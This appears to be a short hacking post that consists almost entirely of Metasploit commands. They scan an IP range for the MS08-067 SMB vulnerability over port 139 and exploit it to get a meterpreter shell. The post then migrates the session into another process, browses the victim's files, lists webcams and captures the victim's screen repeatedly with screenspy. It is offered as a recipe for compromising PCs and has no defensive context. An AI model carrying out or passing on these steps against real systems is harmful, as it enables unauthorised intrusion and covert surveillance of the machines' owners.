Category: Metasploit

Hacking pc using msfconsole port 139

msfconsole

use scanner/smb/ms08_067_check

set RHOST 192.168.1.1-192.168.10.255

set THREADS 100

set SMBDirect false

set PORT 139

RUN

ANOTHER KONSOLE

use exploit/windows/smb/ms08_067_netapi

set payload windows/meterpreter/bind_tcp

set RPORT 139

set SMBDirect false

exploit

connected//

ps

migrate 764

pwd

cd bureau

ls

webcam_list

run screenspy -d 5 -t 30

run screenspy -d 10 -t 30